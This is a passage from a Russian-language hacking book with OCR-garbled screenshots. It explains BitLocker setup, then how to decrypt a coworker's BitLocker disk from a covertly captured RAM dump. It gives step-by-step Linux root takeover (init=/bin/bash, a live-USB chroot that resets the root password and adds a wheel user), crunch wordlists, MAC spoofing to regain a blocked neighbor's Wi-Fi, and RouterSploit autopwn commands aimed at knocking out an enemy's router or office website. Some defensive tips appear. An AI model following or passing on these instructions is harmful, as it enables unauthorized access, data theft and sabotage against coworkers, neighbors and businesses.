# 9.3.3. Включение шифрования и восстановления доступа с помощью ключа восстановления

Для включения шифрования BitLocker выполни следующие действия:

- 1. Открой классическую панель управления и перейди в раздел Шифрование диска BitLocker (рис. 9.18).
- 2. Щелкни по ссылке Включить BitLocker напротив диска, который нужно зашифровать.

ę

- 3. В появившемся окне (рис. 9.19) включи переключатель Использовать пароль для снятия блокировки диска и введи пароль и его подтверждение. Нажми кнопку Далее.
- 4. Выбери, куда сохранить ключ восстановления (рис. 9.20). Сохрани его в файл (рис. 9.21).
- 5. Нажмите кнопку Далее.
- 6. Выбери, что шифровать (рис. 9.22) весь диск или только занятое место. Шифрование только занятого места быстрее и подходит для новых ПК и дисков. Если новый раздел только что создан путем отделения части от диска С:, можно выбрать этот вариант. Если нужно зашифровать диск, который давно использовали, выбери Шифровать весь диск – так надежнее, но придется подождать, иногда несколько часов.
- Выбери режим шифрования. Начиная с версии Windows 1511, BitLocker использует новый режим шифрования дисков, его и нужно выбрать (рис. 9.23). Не нужно ориентироваться на старые компьютеры. В крайнем случае, если тебе придется работать с зашифрованным диском на старой системе, обнови систему – давно пора уже это сделать, учитывая, что на дворе сборка 22H2.
- Нажми кнопку Начать шифрование (рис. 9.24). В зависимости от выбранного режима шифрования и размера диска придется подождать. Дождись сообщения Шифрование завершено и нажми кнопку OK.
- 9. В панели управления будет показано, что BitLocker включен для выбранного диска (рис. 9.25).



#### Рис. 9.18. Шифрование диска BitLocker

Пофравание диско валог	Ser (E)	*
Выберите способы ра	облокировки диска	" Walter and the second
Использовать пароль для	снятия блокировки диска	
Пароли должны содержат	ь прописные и строчные буквы, цифры, пр	обелы и символы.
Введите сдой пароль		
Введите дароль еще раз		
Использовать смарт-карту	для снятия блокировки диска	Stranger Stranger
Необходимо будет встави блокировки с диска.	ть смарт-карту. ПИН-код смарт-карты потр	ебуется при снятии
		Seller A La Se
		14.750
	have a start of the	
a seed of a second		Далее Отмена

Рис. 9.19. Включение шифрования

ать ключ

Рис. 9.20. Куда сохранить ключ восстановления

Сохранение ключа восстановления впеоскет как	
🗠 🤿 🕆 🕅 > Этот ко., > Документы 🔶 🗸	0 🔎 Поиск: Документы
Упорядочить * Новая папка	F · 0
Рабочий стол * Имя	Дата изменения Ти
🗟 Документы 💉 🔜	
Нет элементов, удов	влетворяющих условиям поиска.
📰 Изображени 🖈	
OneDrive	
🕸 Этот компьютер 📩	
🦢 Локальный дисі	
📾 DVD-дисковод (	
👞 Новый том (Е:)	
· · ·	Alter a second and the second
Имя файла: Serial Number TXT	STORE STREET
Імп файла: Текстовые файлы (*.txt)	
and the state of the	Company

Рис. 9.21. Сохранение ключа в файл

У	кажите, какун	о часть дис	ка требуется	зашифровать		
E	ли вы настраива асть диска, котор о мере их добавл	аете BitLocker н ая сейчас испо тения.	а новом диске ил льзуется. BitLock	и ПК, вам достато вт зашифровывае	очно зашифров т новые данные	ать только ту автоматически
Ei Ai Ci	ли вы включает иск. Это гарантир зедения.	е BitLocker на уз рует защиту все	же используемон х данных — дажн	а ПК или диске, ра удаленных, но ег	екомендуется за ще содержащих	шифровать вес извлекаемые
	Шифровать тол дисков)	ько занятое ме	сто на диске (вы	полняется быстре	е, оптимально ,	иля новых ПК и
C	) Ш <u>и</u> фровать вес	ь диск (выполн	яется медленнее	подходит для уж	е используемы	КПК и дисков)
	19					

Рис. 9.22. Какую часть диска нужно зашифровать



Рис. 9.23. Режим шифрования диска



#### Рис. 9.24. Нажми кнопку "Начать шифрование"

🕆 🕆 🏦 🤉 Панель уг	аравления У Все элементы панели управления У	Шифрование диска BitLocker	~ 0	P
Панель управления — домащняя страница	Шифрование диска BitLocker			
	Защитите свои файлы и папки от несанкциони шифрования дисков BitLocker.	рованного доступа с помощью программци		
	Диск операционной системы			
	C: BitLocker отключен	and the second second		0
	Насъемные листи с данными			
	/			
1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1	Съемные носители — BitLocker To G	io	al and a state in	
	Новый том (E) BitLocker включен		Mark Margaretin a	0
	14	Арыслироваты киюч восстановления	Sec. 2	
		Удалить пароль.		1.1
		Добавить смарт-кврту		
S. S. A. S.		Biolosiume Bittocker		
Сихланске				
Администрирование доверенного платформенного модуля				
Управление дисками		States and share been	1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1. 1	
Заналение о конфиденциальности				

Puc. 9.25. BitLocker включен

Теперь сделаем то, что не делают 99% пользователей. Открой файл с ключом шифрования. По умолчанию он выглядит так, как показано на рис. 9.26.



Рис. 9.26. Ключ восстановления

Удали из файла все, что не относится к ключу восстановления. Если у тебя несколько зашифрованных дисков, то придется оставить и идентификатор диска, чтобы ты понимал, к какому диску относится тот или иной ключ восстановления. Но если зашифрованный диск один, то можно удалить смело все, кроме самого ключа (рис. 9.27). Перед сохранением файла сними атрибут **Только чтение**, иначе ты не сможешь сохранить файл. Сам файл лучше поместить на съемный носитель, когорый будет всегда при тебе. Можно записать, например, его на файловую систему твоего телефона – как один из вариантов спрятать ключ восстановления.



Рис. 9.27. Удали все лишнее, что позволит идентифицировать файл как файл ключа восстановления

Сейчас блокировка диска снята, и ты можешь работать с ним, как обычно. При следующей загрузке нужно будет разблокировать доступ к диску – ввести пароль, указанный при шифровании диска, и нажать кнопку Разблокировать (рис. 9.28). Если пароль забыт, используй ссылку Введите ключ восстановления для ввода ключа восстановления.



Рис. 9.28. Разблокирование доступа к диску

Посмотри на рис. 9.25. В панели управления есть возможность архивировать ключ восстановления (если ты случайно удалил файл с ключом вос-

становления), а также включить автоматическое разблокирование диска при входе в систему. В этом случае не придется вводить пароль после каждой перезагрузки, но если за компьютером работает еще кто-то, лучше не использовать эту возможность. Несмотря на то, что диск будет разблокироваться автоматически, данные на диске будут в зашифрованном виде, что позволит противодействовать офлайн-атаке.

## 9.3.4. Дополнительные возможности взлома BitLocker

BitLocker – отличная система, являющая компромиссом между надежностью, скоростью и удобством. По сути, она совершеннее, чем EFS, и ее рекомендуется использовать вместо EFS, несмотря на то, что придется зашифровать целый раздел диска, а не одну папку. Конечно, если не хочется делить диск на разделы и нет желания шифровать системный диск, то придется использовать или EFS, или криптоконтейнеры, но речь сейчас не об этом. Лучше рассмотрим дополнительные способы получения несанкционированного доступа к диску.

Сразу отметим, что в этом разделе мы не будем рассматривать рекомендации относительно манипуляций с файлом ключа восстановления. Об этом было сказано в ранее. Это действительно самый простой способ получить доступ к зашифрованному диску.

Как уже отмечалось, BitLocker – это компромисс. А любой компромисс ослабляет всю систему, независимо от того, на каких стойких алгоритмах она базируется. Проще взламывать не AES, а найти уязвимость непосредственно в самой реализации системы. Нужно искать либо уязвимость, либо специфику реализации.

В случае с BitLocker такой специфики достаточно – копии ключей BitLocker по умолчанию отправляются в SkyDrive и депонируются в Active Directory. Зачем? На случай потери пароля, чтобы можно было восстановить данные. Именно поэтому не нужно сохранять ключи в учетной записи Microsoft – об этом было сказано. Также не нужно использовать учетную запись Microsoft для шифрования раздела. Лучше создайте локальную учетную запись, войти под ней и зашифровать диск, при этом у тебя будет возможность отказаться от публикации ключа в SkyDrive.

Теперь поговорим о предприятии. Пароль восстановления представляет собой 48- и/или 256-разрядную комбинацию, которая генерируется в ходе шифрования диска BitLocker. Когда компьютеров немного, следить за ключами и паролями просто, но если счет идет на сотни, задача сильно усложня-

ется. Групповые политики позволяют сконфигурировать BitLocker так, чтобы хранить в объекте компьютера Active Directory резервные копии ключей и паролей восстановления. Каждый объект восстановления BitLocker имеет уникальное имя и содержит глобальный уникальный идентификатор для пароля восстановления и опционально пакет, содержащий ключ. Если для одного объекта-компьютера в доменных службах Active Directory хранится несколько паролей восстановления, то в имя объекта данных будет включена дата создания пароля. Имя объекта восстановления BitLocker ограничено 64 символами, поэтому изначально следует разрешить 48-разрядный пароль.

Функция хранения восстановительных данных BitLocker базируется на расширении схемы Active Directory, формирующей дополнительные атрибуты. Начиная с Windows Server 2008, расширение установлено по умолчанию, хотя для дальнейшей работы еще требовались донастройки. Оптимальной является схема Windows Server 2012 и выше, в которой все работает "из коробки". Это же касается и следующей версии Windows Server 2016/2019, у которой здесь изменений нет.

Для управления хранением ключей восстановления нужно перейти в раздел Конфигурация компьютера, Политики, Административные шаблоны, Компоненты Windows, Защита диска BitLocker. Нужно проверить состояние политики Хранить сведения о восстановлении в доменных службах Active Directory. Если не нужно, чтобы в Active Directory хранились ключи восстановления BitLocker, нужно выключить эту политику. Но поскольку она по умолчанию включена, то теперь ты знаешь, что, имея доступ к контроллеру домена (возможно, ты – администратор сети), ты можешь получить доступ к зашифрованному диску любого пользователя домена.

Основной способ вскрытия BitLocker – это получение ключа восстановления. Как мы знаем, его можно получить из ненадежно хранимого файла с ключом, из учетной записи Microsoft и из Active Directory.

Если тебя интересует обратная сторона медали, а именно защита зашифрованного диска, следуй простым рекомендациям:

- Файл с ключом восстановления хранить в безопасном месте. Компьютер с зашифрованным диском таким местом не является.
- Не использовать учетную запись Microsoft при включении шифрования, не сохранять ключ восстановления в учетной записи.
- Не сохранять ключ восстановления в AD. Не имея административных привилегий на уровне домена, это будет сложно сделать.

Кроме того, ключи шифрования хранятся в оперативной памяти – иначе не было бы прозрачного шифрования. Это значит, что они доступны в ее дампе и файле гибернации. BitLocker разрабатывался для защиты только от офлайновых атак. Они всегда сопровождаются перезагрузкой и подключением диска в другой ОС, что приводит к очистке оперативной памяти. Однако в настройках по умолчанию ОС выполняет дамп оперативки при возникновении сбоя (который можно спровоцировать) и записывает все ее содержимое в файл гибернации при каждом переходе компьютера в глубокий сон. Поэтому, если в Windows с активированным BitLocker недавно выполнялся вход, есть хороший шанс получить копию ключа VMK в расшифрованном виде, а с его помощью расшифровать FVEK и затем сами данные по цепочке.

Для расшифровки BitLocker-диска есть специальное программное обеспечение, но на "вход" этому ПО нужно подать, кроме самого диска, еще и дамп памяти. Получить дамп памяти достаточно просто – с помощью специальных программ вроде RAM Capture.

Тебе нужно вскрыть BitLocker коллеги? Дождись, пока он отойдет от компьютера, не заблокировав его. Пока не сработает экранная заставка, запусти с флешки RAM Capture и сохрани образ памяти на флешку. Современные компьютеры оснащены 8-16 Гб ОЗУ, а современные флешки уже давно перешагнули за 32 Гб. Так что места хватит, а учитывая USB 3.0, то много времени создание и запись дампа не займут. В крайнем случае, можно спрятать дамп на незашифрованном диске коллеги, например, создать папку C:\tmp и поместить туда дамп. Вечером, когда коллега пойдет домой, все, что тебе нужно сделать, – извлечь его жесткий диск и скормить той самой программе зашифрованный BitLocker раздел и дамп памяти. Дальше – дело техники.

Программа в дампе памяти найдет нужные ключи и расшифрует диск. Программа называется **Passware**, и по адресу *https://www.forensicfocus.com/ articles/how-to-decrypt-bitlocker-volumes-with-passware/* можно ознакомиться с подробной инструкцией по "восстановлению" доступа к диску.

Теоретически, можно и не делать дамп. Дело в том, что современные компьютеры под управлением Windows 10/11 не выключаются, а переходят в гибернацию. Это когда содержимое оперативной памяти сбрасывается на диск, а потом – при загрузке – восстанавливается снова в оперативную память.

Итак, для защиты BitLocker нам нужно закрыть две потенциальные дыры в безопасности. Нам нужно исключить ситуацию, когда кто-то попадет за компьютер во время вашего отсутствия, и выключить гибернацию Windows. Для реализации первого пункта нужно приучить себя всегда блокировать учетную запись, когда отходишь от компьютера. Также нужно настроить небольшой интервал для экранной заставки (1-3 минуты). Да, работать станет менее комфортно, поскольку после 3 минут простоя тебе придется снова вводить пароль, но зато безопаснее. При желании можно уменьшить интервал до 1 минуты.

А для отключения гибернации в Windows 10 открой командную строку с полномочиями администратора и введи команду:

powercfg -h off

Это отключит данный режим, удалит файл hiberfil.sys с жесткого диска, а также отключит опцию быстрого запуска Windows 10 (которая также задействует данную технологию и без гибернации не работает). В результате произойдет следующее:

- Никто не сможет использовать файл hiberfil.sys для получения доступа к BitLocker-диску это хорошо.
- Размер файла гибернации равен размеру оперативной памяти. Отключив гибернацию, ты сэкономишь столько же места на диске (если у тебя 8 Гб ОЗУ, то получишь дополнительные 8 Гб) – это тоже хорошо.
- Windows начнет загружаться медленнее это плохо.

Технология полнодискового шифрования BitLocker отличается в разных версиях Windows. После адекватной настройки она позволяет создавать зашифрованные диски, теоретически сравнимые по стойкости с TrueCrypt или PGP.

## 9.4. Взлом пароля root в Linux

А теперь мы попробуем взломать самую защищенную операционную систему – Linux. Сейчас будет показано, как легко заполучить пароль пользователя root – пользователя, обладающего максимальными правами в Linux. Как только ты получишь права root, ты можешь сотворить с системой что угодно.

Существует два способа простого получения права *root*. Первый – самый простой, и его реализация займет несколько минут, второй – чуть сложнее и он пригодится, если администратор сменил настройки загрузчика GRUB2.

Итак, рассмотрим сначала способ 1:

1. Перезагрузи компьютер. Для этого подойдет или команда *reboot* (во многих дистрибутивах ее могут вводить не только администраторы, но и обычные пользователи), или аналогичная команда, выбранная в меню графического интерфейса, или... нажатие кнопки **Reset** на корпусе компьютера.

- 2. При перезагрузке компа ты увидишь меню загрузчика GRUB2 это основной загрузчик Linux, ставший стандартом де-факто. Вероятность нарваться на какой-то другой загрузчик равна практически 0. На рис. 9.29 показано загрузочное меню для дистрибутива Fedora 33.
- 3. Выдели первый пункт и нажми кнопку для редактирования параметров ядра.
- 4. Появится простейший текстовый редактор, в котором нужно найти строку, которая начинается со слова *linux*. Она содержит передаваемые ядру Linux параметры. В конец этой строки нужно добавить init=/bin/bash, как показано на рис. 9.30.
- 5. Нажми Ctrl + X для загрузки с измененными параметрами ядра.
- 6. Дождись, пока система загрузится, и ты увидишь приглашение командной строки, начинающееся с символа #, – это свидетельствует о том, что ты получил права *root* и теперь можешь делать с системой все, что захочется.

Рис. 9.29. Загрузочное меню

На все про все уйдет несколько минут, большая часть времени будет потрачена на перезагрузку системы.

Теперь способ 2. Он подойдет, если админ был предусмотрительным и поставил пароль на изменение параметров загрузчика GRUB2. В этом случае у тебя ничего не выйдет. Второй способ будет похож на взлом Windows – тебе понадобится загрузочный DVD или USB-диск. Скачай с официального сайта Ubuntu (можно любой другой дистрибутив), создай загрузочный USB- диск с помощью Rufus и загрузись с этой флешки. После загрузки выбери команду **Try Ubuntu** (рис. 9.32).



Рис. 9.30. Редактирование параметров ядра



Рис. 9.31. Fedora 33 взломана!



Рис. 9.32. Загрузка с установочного USB Ubuntu Linux

Далее щелкни правой кнопкой мыши на рабочем столе Ubuntu и выбери команду **Open in Terminal**. Откроется терминал (рис. 9.33), в котором нужно вводить команды.



Рис. 9.33. Терминал

Теперь нам нужно вычислить имя раздела, на котором установлена Linux, пароль от которой ты хочешь заполучить. Введи команду:

sudo fdisk -1

Ты увидишь все разделы на жестком диске компьютера. Нас интересует корневой раздел. Посмотри на рис. 9.34. У нас есть два раздела. Если разделов больше, то нас интересуют только разделы типа Linux. Остальные вроде Linux swap и т.д. нас не интересуют, так как не могут содержать корневую файловую систему Linux.



Обрати внимание на размер раздела. Первый раздел /dev/sda1 занимает 1 Гб, второй – 29 Гб. Ясно, что первый раздел не может содержать корневую файловую систему – он слишком мал для этого (а в 1999 году на компе был установлен жесткий диск 1 Гб и на нем умудрялись помещаться и Linux, и Windows!). Итак, попробуем подмонтировать раздел /dev/sda2 к нашей файловой системе:

sudo mkdir /rootfs sudo mount /dev/sda2 /rootfs

Первая команда создает каталог /rootfs, вторая команда – монтирует раздел / dev/sda2 к каталогу /rootfs. Это означает, что через каталог /rootfs мы сможем обращаться к файлам и каталогам, находящимся на /dev/sda2.



Рис. 9.35. Монтируем жесткий диск жертвы

Просмотрим содержимое каталога /rootfs. Нужные нам файлы, а именно файлы корневой файловой системы, находятся в каталоге /rootfs/root.

А теперь начинаем насиловать систему. Введи команды:

sudo chroot /rootfs/root sudo passwd root Enter new UNIX password: << Введи новый пароль root Retype new UNIX password: << Подтверждение пароля sudo adduser den sudo passwd den sudo usermod -a -G wheel den



Рис. 9.36. Содержимое каталога /rootfs

Разберемся, что мы сделали. Первая команда делает подмену корневой файловой системы для нашей Ubuntu. Другими словами, ядро нашей Ubuntu будет считать, что теперь корневая файловая система находится по адресу /rootfs/root, а не там, где она была раньше. Именно поэтому команда sudo passwd root будет изменять файл /rootfs/root/etc/shadow компьютера жертвы, а не аналогичный файл LiveUSB.

Вторая команда изменяет пароль root. Но не факт, что ты сможешь залогиниться как root. В большинстве случаев вход как root отключен. Именно поэтому мы создали пользователя den – третья команда. Четвертая команда изменяет пароль пользователя den – ведь вход с пустым паролем отключен. Установи любой пароль, который сможешь запомнить, – скоро тебе придется его вводить. Пятая команда добавляет пользователя den в группу wheel, по сути, делает его администратором с возможностью ввода команды sudo.

Все, что тебе остается сделать, – перезагрузить компьютер (команда *reboot*), при перезагрузке вытащи USB с Ubuntu – система должна загрузиться с жесткого диска. После этого ты сможешь авторизироваться как пользователь den и вводить команды *sudo*, что дает тебе те же полномочия, что и использование учетной записи *root*.

Второй способ сложнее и может занять больше времени, особенно если ты никогда не работал с Linux до этого. Да и подготовка LiveUSB тоже занимает время – тебе нужно сначала скачать образ, а затем записать его на флешку. Но в результате ты получишь взломанную систему – то, что и хотел.

Как защититься от такого безобразия? Список мер:

- Используй шифрование eCryptfs для корневой файловой системы. Даже если кто-то и загрузится с LiveUSB, он не сможет ничего сделать, поскольку содержимое диска будет зашифровано. Максимум, что получится у хакера, – все снести, но изменить пароль или добавить пользователя он не сможет. Но от удаления данных никто не застрахован – при желании можно сжечь компьютер, это тоже приведет к удалению данных!
- 2. Установи пароль на BIOS, пароль на загрузчик GRUB2 чтобы никто не смог войти в BIOS без пароля и не смог изменить параметры загрузчика GRUB2.
- 3. Опломбируй корпус компьютера так ты узнаешь, было ли вмешательство.
- 4. Если оно того стоит, установи систему видеонаблюдения, чтобы было видно, кто работал за компом и, что очень желательно, что он за ним делал.

## 9.5. Утилита crunch: генератор паролей

Обычные люди используют генераторы паролей чуть другой направленности. Для обычного человека генератор пароля – это утилита, позволяющая сгенерировать сложный для подбора пароль.

Для хакера **генератор паролей** – это утилита, позволяющая сформировать список паролей. Далее ты передаешь этот список утилите, которая использует метод грубой силы (brute force) для взлома того или иного объекта.

Такие программы работают все по одному алгоритму:

- 1. Берем пароль из списка.
- 2. Передаем объекту.

- 3. Если пароль не подошел, переходим в п. 1.
- 4. Если пароль подошел, сообщаем об успешном взломе.

В мире хакеров лучшей утилитой для генератора списка слов считается Crunch.

Crunch – это генератор списков слов, который может генерировать все возможные комбинации и перестановки.

Программа может работать как в режиме комбинации ключевых слов, так и в режиме перестановки. Он разбивает вывод по количеству строк или размеру файла. Шаблоны Crunch поддерживают числа, символы верхнего/нижнего размера, символы @,% ^.

Рассмотрим, как использовать программу. Если запустить ее без параметров, программа сообщит, что нужно уточнить критерии списка слов:

```
crunch
crunch version 3.6
Crunch can create a wordlist based on criteria you specify.
The output from crunch can be sent to the screen, file, or to
another program.
Usage: crunch <min> <max> [options]
where min and max are numbers
Please refer to the man page for instructions and examples on
how to use crunch.
```

Сгенерируем словарь, содержащий слова с минимальной и максимальной длиной 6 символов (6 6), то есть в словаре будут только 6-символьные пароли. Пароли будут содержать только символы 0123456789abcdef, результат будет сохранен в файл 6chars.txt:

root@kali:~# crunch 6 6 0123456789abcdef -o 6chars.txt Crunch will now generate the following amount of data: 117440512 bytes 112 MB

```
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines:
16777216
```

## Подробную информацию о crunch можно получить по адресу

https://tools.kali.org/password-attacks/crunch



# Глава 10. Взламываем соседский Wi-Fi-роутер

## 10.1. Причины взлома

Зачем тебе нужно взламывать соседский роутер? Причины у всех разные. Рассмотрим наиболее частые:

- 1. Чисто академическая взлом ради взлома, просто чтобы научиться использовать специфический софт. Весьма похвальная и почти благородная цель.
- 2. Экономия зачем платить за свой Интернет, если можно пользоваться соседским?
- 3. Маскировка очень часто Wi-Fi взламывается ради того, чтобы "не светиться". Подъехал к месту, где "ловит" чья-то беспроводная сеть, взломал ее и пользуешься Интернетом даже VPN не нужно. Если и придут, то явно не к тебе. Но для этого взлома соседский роутер не подойдет, тебя могут вычислить. А вот беспроводная сеть в каком-то торговом или офисном центре самое оно.

Все-таки, основная причина взлома Wi-Fi-сети – это экономия. Мода на взлом Wi-Fi была на пике лет 5-10 назад, когда соблюдались два условия: дороговизна Интернета и дырявость шифрования WEP/WPA. Дороговизна доступа заставляла хакеров искать способы экономии. Одним из них был поиск жертв с открытыми портами SMB в сети провайдера. Схема была такова: все подключались без роутеров напрямую в сеть провайдера, допустим, по модемному соединению. Хакер находил системы с открытыми SMB-портами и, используя уязвимость, добирался до файловой системы жертвы. Его интересовали .pwd-файлы, содержащие зашифрованные пароли PPP-соединения. Далее с помощью специальной утилиты данный файл расшифровался, и у хакера были логин и пароль для входа в сеть провайдера. Он разрывал соединение, подключался заново с указанным логином и паролем и получал доступ к Интернету. Схема была популярна очень давно – во времена Windows 98. Сама по себе система была очень дырявая, на ней, как правило, не был установлен брандмауэр и никто не использовал роутеры для доступа к Интернету. Все это и было причиной относительно легкого взлома Интернета. Сейчас же такой способ не пройдет. Во-первых, все сейчас подключаются через Wi-Fi-роутеры, которые закрывают все порты для входящих соединений извне, кроме тех, которые понадобятся для ответа на запрос извне. Другими словами, даже если где-то и есть непропатченная Windows 98, ты ее все равно не найдешь, так как она надежно защищена брандмауэром роутера. Во-вторых, современные версии Windows уже давно пролечены от детских ошибок, да и безопасность, если ее не выключали, на уровне – штатный брандмауэр и антивирус довольно неплохие.

Вторая популярная схема получения халявного доступа к Интернету – взлом Wi-Fi-сети. Ранее (очень давно, в 90-х годах) использовали протокол WEP, который был дырявый как решето, и действительно взлом Wi-Fi занимал очень немного времени. Но потом на смену ему пришел (в 2003 г.) протокол WPA, использующий шифрование. Взлом существенно стал сложнее. Но все же многие Wi-Fi сети по старинке (кто-то купил старый роутер, не поддерживающий WPA, кто-то не знал, что такое WPA и т.д.) использовали протокол WEP. Поэтому в 2005-2007 годах вероятность встретить WEP-сеть была все еще велика. Что и породило много материалов вроде "Как взломать Wi-Fi за 5 минут". В случае с WEP, да, можно взломать за 5 минут. С WPA – все сложнее, так как трафик зашифрован. А вот с WPA2 все еще гораздо сложнее.

Первые устройства, поддерживающие WPA2, стали появляться в 2006 году, но до 2010-го можно с уверенностью сказать, что он использовался не очень часто. Во-первых, не все старые WPA-роутеры были проданы в 2006 году. Эти модели продавались еще и в 2007 и в 2008-ом году. Пользователь, разворачивающий Wi-Fi-сеть, мог попросту купить старое устройство. Во-вторых, не все беспроводные адаптеры поддерживали WPA2. Если в сети было хоть одно устройство, не поддерживающее WPA2, то этот протокол, как правило, выключали и использовали WPA. К 2012 году можно с уверенностью сказать, что во всех Wi-Fi-сетях используется протокол WPA2 – к этому времени все успели обновить роутеры (которые, как правило, больше 4 лет не живут) и сетевые адаптеры. Поэтому взлом Wi-Fi существенно усложнился. Но к этому времени... подешевел Интернет. И особой необходимости взламывать Wi-Fi-сеть уже нет. Понятно, что кто-то будет взламывать Wi-Fi ради того, чтобы попробовать тот самый материал "Как взломать Wi-Fi за 5 минут", кто-то – ради получения чужого IP-адреса, но все же массовых атак на Wi-Fi-сети, как было, скажем 10-15 лет назад, уже нет.

Прежде чем взламывать чей-то роутер, мы рассмотрим два интересных материала. Они не относятся непосредственно к взлому, но как опытный пользователь, ты просто должен об этом знать. Сначала мы попытаемся вспомнить свой же пароль, сохраненный в Windows. Бывает так, что сеть настроил и пароль забыл. А когда появляется необходимость подключения нового беспроводного устройства, приходится устанавливать новый пароль на всех устройствах, что неудобно. Поэтому проще на компьютере, работающем под управлением Windows, подсмотреть используемый пароль, а не перенастраивать роутер.

Еще один трюк – это подмена своего MAC-адреса. Бывает так, что ты пользуешься соседским Интернетом, который ты взломал ради экономии, но сосед вычислил незнакомое устройство в своей сети и заблокировал его. Чтобы получить доступ снова, тебе нужно сменить свой MAC-адрес (ашаратный адрес сетевого адаптера), иначе роутер соседа будет блокировать тебя, даже если пароль правильный.

## 10.2. Узнаем свой пароль Wi-Fi

Следующие действия позволят тебе просмотреть пароль для Wi-Fi-сети, к который ты подключен:

- 1. Щелкни правой кнопкой мыши по значку соединения в области уведомлений и выбери команду Открыть "Параметры сети и Интернет".
- 2. Пролистай открывшееся окно, пока не увидишь ссылку Центр управления сетями и общим доступом
- 3. Появится всем известное (еще по предыдущим версиям Windows) окно Центра управлениями сетями и общим доступом. Выбери в нем команду Изменение параметров адаптера на панели слева.
- 4. В появившемся окне дважды щелкни на адаптере, который используется для беспроводного соединения.
- 5. Откроется окно Состояние Беспроводная сеть. Кстати, по этому окну можно случайно определить проблемы с беспроводной сетью. На рис. 10.2 показано, что соединение работает всего лишь 50 минут, а на самом деле соединение работало с 9 часов утра примерно 6 часов на момент написания этих строк.



6. Нажми кнопку Свойства беспроводной сети. В появившемся окне (рис. 10.3) перейди на вкладку Безопасность и включи флажок Отображать вводимые знаки. Ты увидишь пароль для текущей беспроводной сети.

## 10.3. Меняем МАС-адрес

MAC-адрес – это аппаратный адрес сетевого адаптера, в том числе и Wi-Fiадаптера. Последовательность действий по изменению МАС-адреса следующая:

	пы ранели управления — Центр управления сетями и общим доступом		
Панель управления — домашняя страница	Просмотр основных сведений о сети и настройка подключений Просмотр акцивных сетей		
Изменение параметров адаптера Изменить дополнительные параметры общего доступа	dhallaba 2 Тип доступа: Интернет . Настная сеть Подскочения: aff Беспроводная сеть (dhalaba)		
Параметры потоконой передачи культимедия	Изменение селевых параметров Солдание и нагройка нового поделочения или сети Настройка шероклопелосного, комму перуемого или VPN-подокочения либо настройка имрирутизатора или почик доступа. Устранения неполадок Диалностика и исправление проблем с сетью или получение сведений об устранении неполадок.		
См. также Брандмауэр Защитника Windows			

Рис. 10.1. Центр управления сетями и общим доступом



Рис. 10.2. Состояние – Беспроводная сеть Рис. 10.3. Пароль "восстановлен"

the second second second second second second	Long to the second second	MONGAL
Подключение Безопасное	ль	
C.S. CERTER		nterior contraction
Тип безопасности:	WPA2-Personal	Y
Тип шифрования:	AES	~
Ключ безопасности сети	Awd&458@*109	
	Отображать вводиные	е знаки
Дополнительные пара	метры	
Construction of the local data in the local data	1	
and the second	and the second	and the second
	The second se	Provident Contractor

- Запусти Диспетчер устройств. Если хочешь сделать это быстро, нажми Win + R и выполни команду devmgmt.msc.
- Найди в списке устройств свой сетевой адаптер и дважды щелкни по нему. Он будет в группе Сетевые адаптеры.
- В окне свойств адаптера выбери вкладку Дополнительно, и найди пункт Сетевой адрес (или Network Address), и установи новое значение. Чтобы изменения вступили в силу, нужно либо перезагрузить компьютер, либо отключить и включить сетевой адаптер. МАС-адрес состоит из 12 цифр шестнадцатиричной системы, и задавать его нужно, не используя двоеточия и другие знаки препинания.



Рис. 10.4. Смена МАС-адреса

Примечание. Первые две цифры задаваемого МАС-адреса не нужно начинать с 0, а заканчивать следует 2, 6, А или Е. В противном случае на некоторых сетевых картах смена может не сработать.

**Примечание**. Не все драйверы сетевых адаптеров поддерживают смену МАС-адреса.

В Linux для смены МАС-адреса нужно выполнить следующие команды:

sudo ifconfig wlan0 down sudo ifconfig wlan0 hw ether новый MAC адрес sudo ifconfig wlan0 up sudo service networking restart

Первая команда выключает первый беспроводной адаптер. Вторая – задает новый MAC-адрес. Третья – включает, четвертая – перезапускает сеть.

# 10.4. Взлом роутера с использованием уязвимости

Один из самых простых способов взлома роутера Wi-Fi – использование уязвимости, о которой "знает" инструмент **RouterSploit**.

Данный способ подойдет, если ты уже находишься в сети Wi-Fi, а взлом роутера тебе нужен не для получения доступа в Wi-Fi-сеть, а для других целей, например для обхода ограничений, накладываемых роутером, – если роутер запрещает посещать определенные сайты или закрывать в определенное время доступ к Интернету.

Второе применение RouterSploit – взломать роутер недруга. Если ты знаешь его IP-адрес, далее – дело техники. Ты можешь взломать его и лишить Интернета. Интересно взломать роутер, обеспечивающий доступ к сайту на выходных, - тогда все выходные сайт будет лежать. Некоторые фирмы средней руки для экономии размещают веб-сервер в офисе, и для экономии доступ к Интернету осуществляется примерно таким же роутером, как у тебя дома! Взломать это чудо техники относительно несложно, что и будет показано в этом разделе. Взломав роутер, ты можешь просто перенастроить Интернет так, чтобы он больше не работал (если доступ идет через DSL-соединение, попросту поменяй логин и пароль для подключения к провайдеру, и соединение работать не будет), или же сотворить что-то более злое, например, убрать проброс портов к серверу. Тогда админу придется поковыряться – Интернет то во всем офисе будет, а вот сайт открываться не будет. Готовы поспорить, он сначала полезет "ковырять" сервер, а потом уже додумается, что дело в роутере. На роутер будет думать в самый последний момент ведь Интернет у всех есть и никто не жалуется!

Эксплойты RouterSploit позволяют:

- получить пароль в виде простого текста;
- получить пароль в виде MD5 хеша;
- выполнять команды на удаленном роутере;
- исследовать каталоги роутера и скачивать файлы;
  - 278

- аутентифицироваться без пароля;
- изменять пароль.

Все уязвимости в той или иной мере позволяют изменять настройки сетевого оборудования для реализации последующих атак.

## 10.4.1. Установка и запуск инструмента

Для взлома нам понадобится Debian-подобный дистрибутив, тот же Kali Linux, который ты, надеемся, установил при чтении главы 6.

Чтобы установить RouterSploit, вводим следующие команды:

```
sudo pip install future
sudo apt install git figlet
sudo git clone https://github.com/threat9/routersploit
```

Первая команда установит компонент future для Python, вторая – пакеты git и figlet. Если git у тебя уже установлен, его устанавливать не нужно. Третья – клонирует репозитарий routersploit на твой локальный комп.

Далее переходим в папку Routersploit и устанавливаем зависимости:

```
python3 -m pip install -r requirements.txt
```

Осталось запустить скрипт:

python3 rsf.py

Данный скрипт содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д.

Список всех содержащихся эксплойтов можно посмотреть, прописав команду:

show all

## 10.4.2. Проверка на уязвимость по всем эксплойтам

Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:

```
use scanners/autopwn
set target <ip роутера>, например, set target 192.168.1.1
set port 8080
run
```

